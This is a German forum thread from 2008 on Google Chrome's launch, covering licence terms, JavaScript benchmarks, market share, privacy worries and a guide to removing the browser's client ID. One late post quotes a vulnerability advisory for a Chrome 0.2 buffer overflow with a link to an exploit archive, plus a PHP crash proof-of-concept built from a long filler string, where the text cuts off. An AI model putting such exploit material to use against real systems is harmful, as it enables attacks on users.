Google Chrome - Details zum Google-Browser (Download inside)

Dieses Thema im Forum "Netzwelt" wurde erstellt von zwa3hnn, 1. September 2008 .

  1. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    Hmm kann der Browser denn mit Safari mithalten?
    Ist mein Lieblingsbrowser im Moment :/
    Oder wie schauts mit der umsetzung für Mac OS X aus?
     
  2. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    An Mac und Linux Versionen wird momentan noch gearbeitet.


    Chrome: Google ändert Nutzungsbedingungen (Update)
    Google streicht umfangreiche Rechteabtretung der Nutzer
    Nicht nur die Anmerkungen zum Datenschutz zu Googles neuem Browser Chrome sorgen für Diskussionen. Auch die in der EULA festgehaltenen Nutzungsbedingungen sorgten für Aufsehen, lässt Google sich darin doch eine "unbefristete, unwiderrufliche, weltweit gültige, unentgeltliche und nicht exklusive Lizenz" an allen übermittelten, eingestellten oder angezeigten Inhalten einräumen. In den USA hat Google auf die Kritik reagiert.


    Es ist nicht die erste Diskussion um Googles EULAs und darin enthaltene Rechteabtretungen. Bereits im Zusammenhang mit Google Docs wurde der Punkt 11 der Nutzungsbedingungen kritisiert. Darin heißt es: "Durch Übermittlung, Einstellung oder Darstellung der Inhalte gewähren Sie Google eine dauerhafte, unwiderrufliche, weltweite, kostenlose und nicht exklusive Lizenz zur Reproduktion, Anpassung, Modifikation, Übersetzung, Veröffentlichung, öffentlichen Wiedergabe oder öffentlichen Zugänglichmachung und Verbreitung der von Ihnen in oder durch die Services übermittelten, eingestellten oder dargestellten Inhalte."

    Genau diese Formulierung findet sich nun auch in den Nutzungsbedingungen von Google Chrome. Während man in Bezug auf Google Docs aber immerhin noch gutwillig argumentieren kann, diese Rechteabtretung sei nachvollziehbar, zeigt Google diese Inhalte doch auf Wunsch des Nutzers im Internet an, so wirken sie bei einem Browser vollkommen deplatziert. Es sei denn, Google will wirklich über alle Inhalte der Nutzer verfügen können.

    Das sieht auch Google ein und hat in den USA den Punkt 11 der Google Chrome Terms of Service radikal zusammengestrichen. Dort heißt es unter Punkt 11 nun nur noch: "Das Urheberrecht sowie sämtliche anderen Rechte, die Sie hinsichtlich Ihrer mithilfe der Services übermittelten, eingestellten oder angezeigten Inhalte bereits besitzen, verbleiben in Ihrem Besitz." Diese Regelung gelte auch rückwirkend, so Google. Es sei Googles Ziel, die Dinge für Nutzer einfach zu halten und möglichst für alle Produkte die gleichen Nutzungsbedingungen zu verwenden. Das führe aber dazu, dass manche Regelungen nicht zum Produkt passen, wie in diesem Fall. Daher habe man reagiert.

    In den deutschen Nutzungsbedingungen findet sich noch die alte Formulierung, in der es unter Punkt 11.2 heißt: "Sie erkennen an, dass diese Lizenz Google dazu berechtigt, die Inhalte anderen Unternehmen, Organisationen oder Personen zugänglich zu machen, die mit Google zum Zweck der Bereitstellung syndizierter Services zusammenarbeiten, sowie die Inhalte im Rahmen der Bereitstellung solcher Services zu nutzen."

    Da Google die Nutzungsbedingungen in den USA erst in der Nacht zum Donnerstag, dem 4. September 2008, verändert hat, ist zu erwarten, dass auch die deutschen Nutzungsbedingungen noch geändert werden. Im Fall von Google Docs blieben die deutschen Nutzungsbedingungen allerdings auch einen Monat nach Bekanntgabe noch unkorrigiert.

    Nachtrag vom 4. September 2008, 9:43 Uhr:
    Mittlerweile hat Google gegenüber Golem.de bestätigt, dass auch die deutschen Nutzungsbedingungen schnellstmöglich und rückwirkend geändert werden.


    quelle: Golem.de



    Mozilla: Firefox ist schneller als Chrome
    Geschwindigkeit von JavaScript-Engines legt deutlich zu
    Google preist seinen neuen Browser Chrome als besonders schnell an, insbesondere im Hinblick auf die Ausführungsgeschwindigkeit von JavaScript. Doch die Firefox-Entwickler wollen diese Darstellung so nicht stehen lassen und zeigen mit einer neuen Entwicklerversion, dass Firefox durchaus schneller sein kann als Chrome.


    Bild
    TraceMonkey-Benchmarks​

    Erst seit wenigen Monaten arbeiten die Mozilla-Entwickler an ihrem Projekt TraceMonkey, das die in Firefox 3 genutzte JavaScript-Engine SpiderMonkey beschleunigt. Erste Benchmarks zeigten bereits einen deutlichen Geschwindigkeitszuwachs. Dennoch war Googles Browser Chrome zu seiner Veröffentlichung am 2. September 2008 deutlich schneller als die aktuellen Firefox-Builds, die mit aktiviertem TraceMonkey zum Teil langsamer liefen bzw. einige der Tests nicht absolvieren konnten. Es handelte sich dabei um automatisch erzeugte Builds aus dem aktuellen Entwicklungszweig, denen keine große Bedeutung zuzumessen ist, denn das Ergebnis kann schon am nächsten Tag ganz anders aussehen.

    Dem Eindruck, dass Chrome deutlich schneller ist als Firefox, will Mozilla-Entwickler Brendan Eich entgegentreten. Dazu hat er Benchmarks veröffentlicht, die zeigen, dass eine aktuelle Entwicklerversion von Firefox im JavaScript-Benchmark SunSpider unter Windows XP und Vista zwischen 19 und 28 Prozent schneller ist als Chrome. Dafür sorgt vor allem die Beseitigung eines Fehlers in der JavaScript-Engine von Firefox, der die Ergebnisse in einem Test von SunSpider besonders negativ beeinflusste.

    In einzelnen Tests ist Firefox mit TraceMonkey im aktuellen Stadium viermal schneller als Googles JavaScript-Engine V8, in anderen hat hingegen V8 deutlich die Nase vorn.

    Nachgemessen:

    Wir haben mit einer aktuellen Entwicklerversion von Firefox 3.1 (Firefox 3.1b1 vom 4. September 2008) nachgemessen: Mit aktiviertem TraceMonkey schneidet Firefox im SunSpider-Benchmark besser ab als Chrome und braucht auf unserem Testsystem mit Windows Vista nur 1.033 ms zum Durchlaufen der Tests, Chrome 1.180 ms. Ohne TraceMonkey benötigt Firefox 3.1b1pre 1.739 ms.

    Bild
    TraceMonkey-Benchmarks​

    In Googles V8-Benchmark hat Chrome weiterhin die Nase vorn: 2.727 Punkte gegen 281 bei Firefox mit TraceMonkey und 260 ohne. Allerdings wurde Chrome auch auf diesen Benchmark optimiert und es ist vermutlich nur eine Frage der Zeit, bis auch andere JavaScript-Engines die V8-Benchmarks bei ihrer Entwicklung einbeziehen.

    Auch in Dromaeo ist Chrome schneller und braucht nur 274 ms, Firefox hingegen 657 ms mit TraceMonkey und 910 ms ohne.

    All das zeigt vor allem eines: Es ist viel Bewegung in diesem Thema und Google heizt den Wettbewerb mit V8 weiter an, es gibt viele Bereiche mit großem Potenzial für Verbesserungen. Schnelle JavaScript-Engines dürften das Web als Plattform für komplexe Anwendungen einen entscheidenden Schritt voranbringen, unerheblich, ob sie TraceMonkey, Tamarin, SquirrelFish oder V8 heißen und ob die eine oder andere ein paar Prozent schneller ist. All diese Kandidaten sind zudem Open Source, was einen Austausch der Ideen und Konzepte vereinfachen dürfte. Viele der Konzepte sind zudem noch recht jung, ihr Potenzial nicht ausgeschöpft, so dass in der nächsten Zeit weitere nennenswerte Fortschritte zu erwarten sind.


    quelle: Golem.de
     
  3. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    es fängt so langsam an wie bei grafikkarten, bei den einen sachen is amd schneller, bei den anderen is nvidia schneller, die einen werden ewig auf ff schwören, die anderen auf chrome und es wird ein ewig währender glaubenskrieg entstehen

    Mir persönlich gefällt der Chrome Browser sehr gut, ich warte noch darauf wie es bei ihm mit plugins wie no-script oder adblock aussieht und dann ist er eine echte alternative zum ff, zumindest für mich,
     
  4. 4. September 2008
    Chrome übertrumpft Opera & Netscape

    Google hat seinen Browser Chrome veröffentlicht und mit Spannung wird erwartet, wie sich das auf die Verteilung der Marktanteile der Browser auswirken wird. Einen ersten Erfolg hat Chrome in der Hinsicht schon verbucht.

    Wird der frisch gestartete Browser Google Chrome vor allem dem Internet Explorer oder Firefox schaden? Laut Angaben von Web-Analysten ist es Google Chrome bereits nach 24 Stunden gelungen, einen Browser-Marktanteil von über einem Prozent zu ergattern. Das haben sowohl Messungen des US-Unternehmens Net Applications als auch des irischen Unternehmens StatCounter ergeben. Auf einem Schlag ist es damit dem Google-Browser gelungen, jahrelang auf dem Markt aktive Browser auszustechen.

    "Das ist eine phänomenale Performance", schreibt Statcounter-Chef Aodhan Cullen im Unternehmens-Blog und fügt hinzu, dass Google vor allem auf die Marktanteile vom Internet Explorer abziele, letztendlich aber die Firefox-User eher dazu neigen würden, einen neuen Browser auszuprobieren. Cullen erwartet daher, dass Chrome eher die Marktanteile von Firefox negativ beeinflussen wird.
    Net Applications hat ermittelt, dass Google Chrome in den ersten 24 Stunden einen Marktanteil von bis zu 1,48 Prozent erreicht hat. Bereits eine Stunde nach der Veröffentlichung lag der Marktanteil von Chrome bei 0,4 Prozent. Neun Stunden später wurde die 1-Prozent-Marke überschritten.
    Net Applications erwartet, dass sich der Marktanteil von Google Chrome in den nächsten Tagen inklusive dem Wochenende stark erhöhen wird. Dabei beruft man sich auf die Erfahrungen, die man bei der Beobachtung der Marktanteile von Firefox gemacht hat. Die Firefox-Marktanteile stiegen in der Vergangenheit vor allem an Wochenenden.
    Unklar ist zu diesem Zeitpunkt natürlich, ob die Anwender, die jetzt Google Chrome nutzen, dem neuen Browser auch treu bleiben. Daher sind die Angaben zu den Marktanteilen von Chrome noch alles andere als verlässlich.
    Erstes "Opfer" von Google Chrome ist aber auch laut den Zahlen von Net Application der Browser Opera. Die Norweger bringen seit Jahren einen im Prinzip hervorragenden Browser auf den Markt, hatten aber zuletzt laut Net Applications nur einen Marktanteil von 0,74 Prozent. Diesen Anteil konnte Chrome auf Anhieb übertreffen, ebenso wie die 0,72 Prozent der Netscape-Fans, die ihrem mittlerweile angestaubtem Browser die Treue halten.

    Quelle: Chrome übertrumpft Opera & Netscape - Browser-Marktanteile - Online & Browser - PC-WELT
     
  5. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    also eig. hab ich nichts gegen google auch mit dem daten loggen etc...was solls ich kann nicht drauf verzichten

    Aber ich denke ich werde erstmal abwarten wie sich chrome entwickelt und firefox treu bleiben auch wenn mit ff3 nen paar probs macht im moment.
     
  6. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    also an sich find ich den browser schön schnell

    aber

    meine rapidshare uploads sind völlig unsortiert X(

    und auf manchen seiten kann ich mich nicht einloggen z.b. meine router config :angry:

    und das scrollrad funktioniert auch noch nicht richtig

    hat jemand ähnliche probleme oder liegts an mir????????
     
  7. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser

    Ohh man ich liebe dieses Board war kurz davor mir den Crome mal zu laden doch zum glück hab ich mich hier nochmal erkundigt.
    Ich lass es sein^^
    DANKE!!!!
    Ramper
     
  8. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    Hab Chrome auch mal angetestet und auch gleich wieder verworfen da ich keine YT vids schauen kann. "We're sorry, but this video istn longer available". Und das obwohl YT und google zusammenhängen xD n1.
    Hier Infos zum Prob:

    Issue 139 -
    chromium -

    Youtube showing video no longer available in ALL videos -
    An open-source project to help move the web forward. - Google Project Hosting
     
  9. 4. September 2008
    Google Chrome: Eindeutige Nummer des Browsers abschalten

    Google Chrome: Eindeutige Nummer des Browsers abschalten
    Bearbeitung von Konfigurationsdateien erforderlich
    Bekanntlich teilt Google jedem ausgelieferten Browser eine eindeutige Nummer zu, über welche der Nutzer identifiziert werden kann. In den Konfigurationsdateien kann dies ausgeschaltet werden. Allerdings macht es Google dem Anwender nicht gerade einfach, die Browseridentifikation loszuwerden.


    Google Chrome legt die sogenannte Chrome-ID in der Datei "Local State" ab. Diese findet sich auf Windows-XP-Rechnern unter X:\Dokumente und Einstellungen\NUTZER\Lokale Einstellungen\Anwendungsdaten\Google\Chrome\User Data und auf Windows-Vista-Maschinen unter X:\Users\NUTZER\AppData\Local\Google\Chrome\User Data. Dabei steht X für den Laufwerksbuchstaben, auf dem das Betriebssystem installiert ist, und NUTZER repräsentiert den angemeldeten Benutzernamen.

    Bevor "Local State" in einem Editor geöffnet wird, sollte der Browser beendet werden. Nun springt man in der Datei zu dem Bereich "user_experience_metrics". In diesem Segment speichert Google Chrome die Kennnummern des Browsers ab und zwar in den Zeilen "client_id" und "client_id_timestamp". Die Zahlen in den Anführungszeichen können gelöscht werden, so dass der obere Eintrag folgendermaßen aussieht: "client_id": "",

    Nachdem die Datei abgespeichert wurde, muss der Schreibschutz gesetzt werden. Ansonsten aktualisiert Google Chrome die Datei und schreibt wieder eine Kennung hinein. So einfach ist der Nutzer die Chrome-ID nicht los. Denn Googles Browser legt eine Kopie an, wenn die Software keinen Zugriff auf die Datei "Local State" hat. Nachdem der Browser einmal gestartet und wieder beendet wurde, liegt nun auch die Datei "Local State.tmp" in dem oben angegebenen Verzeichnis.

    Nun muss auch diese Datei in einem Editor geöffnet werden, damit auch darin die Chrome-ID gemäß der obigen Beschreibung entfernt werden kann. Auch hier muss die Datei nach dem Abspeichern mit einem Schreibschutz versehen werden, weil der Browser ansonsten wieder eine Kennnummer in die Datei hineinschreibt. Durch die Löschung der Chrome-ID in Googles Browser sollte es dem Konzern schwerer fallen, Daten zu sammeln, die eindeutig zugeordnet werden können. Stichproben zeigten, dass der Browser auch nach Entfernen der Chrome-ID wie gewohnt funktionierte und es keine Einschränkungen gab.

    Nicht verhindern kann man damit, dass der Browser weiterhin aufgerufene URLs sowie Suchanfragen an Google übermittelt. Dies kann aber in den Browsereinstellungen deaktiviert werden. Dazu muss in den Suchmaschinenoptionen der Haken "Automatische Vorschläge zur Vervollständigung der in die Adressleiste eingegebenen Suchanfragen und URLs" deaktiviert werden.


    quelle: Golem.de
     
  10. 4. September 2008
    AW: Google Chrome: Eindeutige Nummer des Browsers abschalten

    Wie kann man jetzt den Firefox schneller als Chrome machen xD Ich blicks nicht oO
     
  11. 4. September 2008
    AW: Google Chrome: Eindeutige Nummer des Browsers abschalten

    Die aktuellen Entwickler-Versionen des FireFox sind in einigen Tests schneller als Chrome.
    Die kannst du dir natürlich runterladen, das ist aber nicht empfehlenswert, da es eben Entwicklerversionen sind und diese dementsprechend instabil sein können.
     
  12. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    habe es mir runtergeladen, direkt nach release und ich bin wirklich positiv davon überrascht.

    mit nem multikern, saußt man echt durchs netz.

    wenn ich es mit meinem lappy use dann kann mir ruhig jeder meine daten stehlen. ich arbeite mit dem teil und hab nix zu befürchten.
     
  13. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    das dein rechner wegen chrome langsamer wird ? LOL
    der browser frisst weniger resourcen als jeder andere browser wieso
    zum teufel soll dein rechner dann langsamer werden rofl?

    denken -> posten !
     
  14. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser

    Solche Beiträge finde ich ja immer sehr gut.... "Behauptungen" aufstellen, aber keine direkten Beweiße, Quellen dafür haben....

    Klar das Google an sich ne Menge speichert ist allgemein bekannt, aber ich glaube ehr das es viele Mitläufer gibt die sagen "Ich benutze keine Google Produkte wegen Datenschutz etc." denn das liest man sehr sehr oft, wenn es um Google geht.

    Und dann soll Google doch meine Daten, Suchanfragen etc. speichern und damit "handeln" ..... bis jetzt hatte ich durch Google noch keine Nachteile ehr im Gegenteil.
     
  15. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser

    ja und is mir egal die wissen doch eh schon alles von mir und ob die etz die 5 seiten auch noch wissen wo ich rumsurf is mir egal!!

    also von der seitenaufbaugeschwindigkeit her kann ich net sagen ob ff schneller is da einfach meine leitung viel zu langsam ist
    aber schon beim start draufgeklickt und browser is offen
    finds einfach n1 !!
     
  16. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser

    Da biste der Marketing-Strategie von Microsoft aber schön auf den Leim gegangen...
    Meine Meinung bezüglich Chrome: speichert zu viele Daten, sogar jede URL selbst wenn nicht verfügbar....
    Wenn überhaupt, dann den Quellcode von Chronium herunterladen und dann von Hand die Spionagefunktionen ausbauen (falls dies möglich ist....)

    MFG
    TuXiFiED
     
  17. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser

    genau das selbe hab ich mir auch gedacht als ich das gehört und gelesen hab ey
    heute noch darüber mit meinen arbeitskollegen im büro unterhalten.....
    firefox und opera hab ich, benutz ich und dabei bleib ich, google kann mir mal ganz vulgär gesagt den ***** lecken oO
    mfg peter hoden
     
  18. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    Hier mal ein kleines News Update:


    Quelle:
    Gulli.com
     
  19. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    also ich werd auch auf jeden fall beim FF bleiben! bin absolut zufrieden und wüsste nicht warum ich nen anderen benutzen sollte! außerdem gefällt mir das design nicht so unbedingt!
     
  20. 4. September 2008
    AW: Google Chrome - Details zum Google-Browser

    hab mir grad die beta version geladen. bin positiv überrascht. alles läuft sehr schnell ab, das freut mich. denke das ich dennoch erstmal weiterhin ff benutze, kann mir aber auch gut vorstellen in späterer zukunft zu wechseln. vll wird es ja auch einen ähnlichen abklatsch finden ohne spionage fkt. bin mal gespannt was so kommen wird.
     
  21. 5. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    Allerdings ist der Webbrowser so voreingestellt, dass eine eindeutige Anwendungsnummer, die IP-Adresse des Nutzers und einige Cookies an Google übermittelt werden. Auch wird die vom Nutzer eingegebene URL an Google übersandt.

    Open Source hin oder her, das klingt für mich eindeutig nach Spionage.


    Googles Webbrowser Chrome wühlt das Web auf | heise online
     
  22. 5. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    habe mich eben mal über die sicherheitslücken erkundigt:

    Die erste Sicherheitslücke im Google-Browser - Google Chrome - Sicherheitslücken - PC-WELT

    und am eigenen leib getestet:

    1. der browser absturz ist wohl eine testfunktion der chrome entwickler um die restart des browsers zu testen, die schlicht vergessen wurde zu entfernen! --> keine fiese sicherheitslücke.

    2. java applications werden einfach ausgeführt(carpet-bomb). ist bei mir nicht der fall? ich muss bestätigen das ich diese datei speichern und ausführen will?

    3. das mit dem datenschutz is nicht der hit aber war von google nicht anders zu erwarten.

    4. denke ich das das 1. eine beta ist und 2. opensource. d.h. wenn mir die einstellungen von google nicht passen, lad ich mir eine (bestimtm bald anch offiziellen release erhälltliche) gefixxte version von drivat andwendern herunter... ende des problems...

    fazit: warten was die zukunft bringt...

    greeze wurm
     
  23. 5. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    klar ist es spionage allein die sache mit der ID nummer is doch schon spionage genug.. infos sammeln etc..

    ich nutz weiterhin mein firefox dann wird alles gut
     
  24. 6. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    1. Punkt: Jeder Tab in eigenem Prozess:
    Ein gut programierter Browser bräuchte diesen Schnickschnack nicht, denn er würde gar nicht abstürzen, wenn einer sowas nötig hat, macht mich das in bezug auf die Stabilität doch sehr Misstrauisch. Außerdem klingt sowas (bin zwar weit davon entfernt, experte zu sein) nach einer Menge Arbeit für das Betriebssystem - Prozesse starten, Ressourcen gerecht verteilen, Prozesse schließen etc. etc.

    2. Es wird weniger als 4 Wochen dauern, nachdem Google die Linzenzschwierigkeiten gelöst hat, bis ein "FreeChrome" rauskommt, der keine Spionagewerkzeuge mehr hat und auch sonst keine "Do nothing evil"(Ha!)-Tools mitbringt. Jeder Halbwegs intelligente Mensch wird den benutzen - d.h. maximal 5 Prozent der Leute die Chrome überhaupt nutzen.
     
  25. 6. September 2008
    AW: Google Chrome - Details zum Google-Browser (Download inside)

    bei den Sicherheitslücken in kurzer zeit .... lass mal lieber , google = nicht hetero und so toll isser nit


    Code:
    PoC Code is in Attach file because this file is saved in 'Unicode' type for exploit.
    
    Here is Description for this Vuln :
    · Type of Issue : Buffer Overflow. 
    · Affected Software : Google Chrome 0.2.149.27. 
    · Exploitation Environment : Google Chrome (Language: Vietnamese) on Windows XP SP2.
    · Impact: Remote code execution.
    · Rating : Critical .
    · Description :
    The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving 
    a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes 
    it possible for attackers to execute arbitrary code on users’ systems.
    · How an attacker could exploit the issue :
    To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. 
    He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would 
    be executed, giving him the privilege to make use of the affected system.
    · Discoverer : Le Duc Anh - SVRT - Bkis
    · About SVRT :
    SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes 
    in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols 
    and embedded systems…
    · Website : security.bkis.vn
    · Mail : svrt[at]bkav.com.vn
    
    http://milw0rm.com/sploits/2008-chrome.tgz
    
    
    Code:
    <?php
     
    /*
    Google Chrome 0.2.149.27 (1583) Silent Crash PoC
    WHK - elhacker.net
    */
     
    $nombre = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa